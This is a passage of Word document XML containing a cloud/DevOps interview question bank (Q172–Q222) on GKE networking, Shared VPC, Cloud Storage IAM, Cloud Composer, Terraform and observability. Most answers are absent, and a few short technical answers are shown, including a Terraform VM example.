      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q172. GCP services experience: Which GCP services have you worked with hands-on, and in what capacity on each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q173. GKE networking overview: Explain how networking works in GKE at a high level, from Pod IP allocation to external traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q174. Pod-to-pod communication: How do Pods communicate with each other inside the same GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q175. Cross-namespace GKE networking: In GKE specifically, how does cross-namespace Pod communication work at the network layer, and how would a NetworkPolicy change that?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q176. Exposing GKE externally: How would you expose a GKE application to the internet, and what options would you choose between?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q177. Securing external URL: Once an application is exposed externally, how do you secure that public endpoint end to end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q178. Cloud Armor purpose: What is the purpose of Cloud Armor, and what kinds of threats does it protect against?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q179. Pod internet access: How does a Pod in a private GKE cluster reach the internet if it has no public IP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q180. Network flow Pod to Internet: Walk through the full network path from a Pod to the internet: Pod, Node, VPC, Cloud NAT, Internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q181. Shared VPC definition: What is a Shared VPC in GCP, and why would an organization use one instead of per-project VPCs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q182. Host Project role: What is a Host Project in a Shared VPC setup?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q183. Service Projects role: What are Service Projects in a Shared VPC, and how do they relate to the Host Project?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q184. Subnet sharing across projects: How are subnets shared across projects in a Shared VPC architecture, and how is access to them controlled?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q185. Bucket design considerations: What should you consider before creating a Cloud Storage bucket for a production workload?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q186. Storage classes: What are the different Cloud Storage storage classes, and how would you choose between them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q187. Uniform bucket-level access: What is Uniform Bucket-Level Access in Cloud Storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q188. Fine-grained access: What is Fine-Grained Access in Cloud Storage, and when would you still need it over uniform access?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q189. GCS authentication: How do applications authenticate to a Cloud Storage bucket?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q190. Read-only IAM role: Which IAM role would you assign to a service account that only needs read-only access to objects in a bucket?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q191. Avoiding service account keys: Why should you avoid using service account keys, and what would you use instead?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q192. Workload Identity: What is Workload Identity, and what problem does it solve?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q193. Cloud Composer experience: Have you worked with Cloud Composer, and in what context?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q194. How Composer works: Explain how Cloud Composer works under the hood.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q195. Composer environment components: What components get created in your project when you provision a Cloud Composer environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q196. Self-hosting Airflow: How would you host Apache Airflow yourself outside of Cloud Composer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q197. Composer project role: What was your specific role in a Cloud Composer project you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q198. Terraform VM creation: Write Terraform code to create three virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: resource "google_compute_instance" "vm" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  count        = 3</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name         = "app-vm-${count.index}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  machine_type = "e2-medium"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  zone         = "us-central1-a"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  boot_disk {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    initialize_params {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      image = "debian-cloud/debian-12"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  network_interface {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    network = "default"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    access_config {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>Using count = 3 with count.index in the name gives three distinct instances (app-vm-0, app-vm-1, app-vm-2) from one resource block; for anything where instances have meaningfully different attributes, for_each over a map is the better fit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q199. Reusable VM module: How would you design a reusable Terraform module for creating virtual machines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q200. count vs for_each: Would you use count or for_each for creating multiple similar resources in Terraform, and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q201. Landing Zone overview: Explain what a Landing Zone is and how an organization's Landing Zone is typically structured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q202. Landing Zone components: What components typically exist inside a cloud Landing Zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q203. Centralized networking/logging/monitoring: How are networking, logging, and monitoring centralized across projects in a Landing Zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q204. Project-to-Shared-VPC connection: How are individual projects connected to the Shared VPC in a Landing Zone design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q205. Scenario - GKE Autopilot vs Standard: A team wants to move a workload to GKE Autopilot for cost and ops simplicity. What tradeoffs would you flag before they commit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q206. Scenario - private cluster master access: A private GKE cluster's control plane becomes unreachable from a new office network. How would you diagnose and fix authorized network access?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q207. Scenario - Cloud NAT port exhaustion: Outbound calls from GKE Pods start failing intermittently and Cloud NAT logs show port exhaustion. How would you diagnose and remediate it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q208. Scenario - VPC Service Controls block: A data pipeline suddenly gets permission-denied errors reading from BigQuery after a security team change. How would you determine if VPC Service Controls are the cause and fix it safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q209. Scenario - Terraform workspaces vs directories: How would you decide between Terraform workspaces and separate state directories for managing dev, staging, and prod environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q210. Scenario - Composer DAG stuck: An Airflow DAG in Cloud Composer has tasks stuck in a queued state for 30 minutes with no errors. How would you triage it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q211. Scenario - Jenkins shared library: Ten pipelines duplicate the same deployment logic with slight drift between them. How would you refactor this using a Jenkins shared library?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q212. Scenario - IAM conditional binding: Security wants a service account to have Storage Object Viewer only during business hours and only on a specific bucket. How would you implement that in IAM?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q213. Scenario - default-deny NetworkPolicy rollout: You need to introduce a default-deny NetworkPolicy in a shared GKE cluster with many existing teams. How would you roll it out without breaking production traffic?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q214. Today interview 2026-07-06 - Python equality: What does the == operator do in Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The == operator checks value equality. It asks whether two objects should be considered equal according to their type's equality implementation, usually __eq__. For example, [1, 2] == [1, 2] is True because the two lists contain equal values in the same order, even though they are different list objects. This is different from is, which checks whether two variables point to the exact same object in memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q215. Today interview 2026-07-06 - Environment availability: How would you manage availability across Dev, QA, and Prod environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Availability should match environment criticality. Prod gets multi-zone or multi-region design, autoscaling, backups, SLOs, alerting, DR drills, and strict change windows. QA should be stable enough to validate releases but can usually use reduced capacity. Dev can tolerate lower availability and scheduled shutdowns for cost. The key is not making all environments equally expensive; it is making non-prod representative enough to catch issues before prod while preserving prod-grade resilience where users depend on it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q216. Today interview 2026-07-06 - Safe promotion: How would you promote infrastructure and application changes safely between environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Promote the same tested artifact or module version from dev to QA to prod instead of rebuilding at each stage. Use CI checks, Terraform plan review, policy-as-code, automated tests, smoke tests, approvals, and progressive deployment. For infrastructure, pin module versions and promote version bumps through environment directories. For applications, use immutable image tags, canary or blue-green rollout, health checks, SLO gates, and clear rollback criteria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q217. Today interview 2026-07-06 - Symptom vs cause alerts: Explain symptom-based versus cause-based alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Symptom-based alerts fire on user-visible impact: error rate, latency, failed transactions, unavailability, or stale data. Cause-based alerts fire on possible reasons: CPU high, Pod restart, disk pressure, certificate near expiry, queue backlog, or database lock contention. Symptom alerts are better for paging because they tell you users are affected. Cause alerts are useful for ticketing, dashboards, or diagnostics, but too many cause alerts can create noise if they do not correlate with real impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q218. Today interview 2026-07-06 - Noisy alerts: How do you reduce noisy alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Inventory alerts, remove duplicates, map each alert to an owner, runbook, severity, and user impact, and disable alerts that are not actionable. Convert raw resource threshold pages into SLO or symptom-based alerts where possible. Tune thresholds with historical data, add for/duration windows, group related alerts, route low-severity issues to tickets, and use inhibition so one root incident does not page ten times. After incidents, review whether alerts were early, late, missing, or noisy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q219. Today interview 2026-07-06 - Telemetry collection: What telemetry do you collect for a production Kubernetes platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Collect metrics, logs, traces, events, and audit signals. Metrics include golden signals, Pod/container CPU and memory, restarts, saturation, node pressure, HPA/autoscaler behavior, API server health, ingress/load balancer metrics, database and queue health. Logs should be structured with service, environment, version, request ID, trace ID, and error fields. Traces should cover critical request paths. Also collect Kubernetes events, deployment/change events, Cloud Audit Logs, security findings, and business metrics for user journeys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q220. Today interview 2026-07-06 - Trace ID: Why should every request carry a Trace ID?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A trace ID gives one request a stable identity across many services, Pods, queues, and databases. Without it, debugging a distributed failure becomes guesswork across timestamps and partial logs. With it, you can see the full path, latency per hop, failed dependency, retries, and logs related to the same user request. It also improves incident response because engineers can move from a customer complaint to the exact backend path quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q221. Today interview 2026-07-06 - Structured JSON logging: Explain structured JSON logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structured JSON logging means each log line is a JSON object with consistent fields instead of a free-text sentence. For example: timestamp, severity, service, environment, version, trace_id, request_id, user_id, route, status_code, latency_ms, and error_type. This makes logs searchable, aggregatable, and machine-processable in tools like Cloud Logging, Elasticsearch, Loki, or Splunk. It also helps alerting and incident analysis because you can query fields reliably instead of parsing text with brittle regexes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q222. Today interview 2026-07-06 - Terraform module separation: Design Terraform module separation for networking, IAM, GKE, databases, and observability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
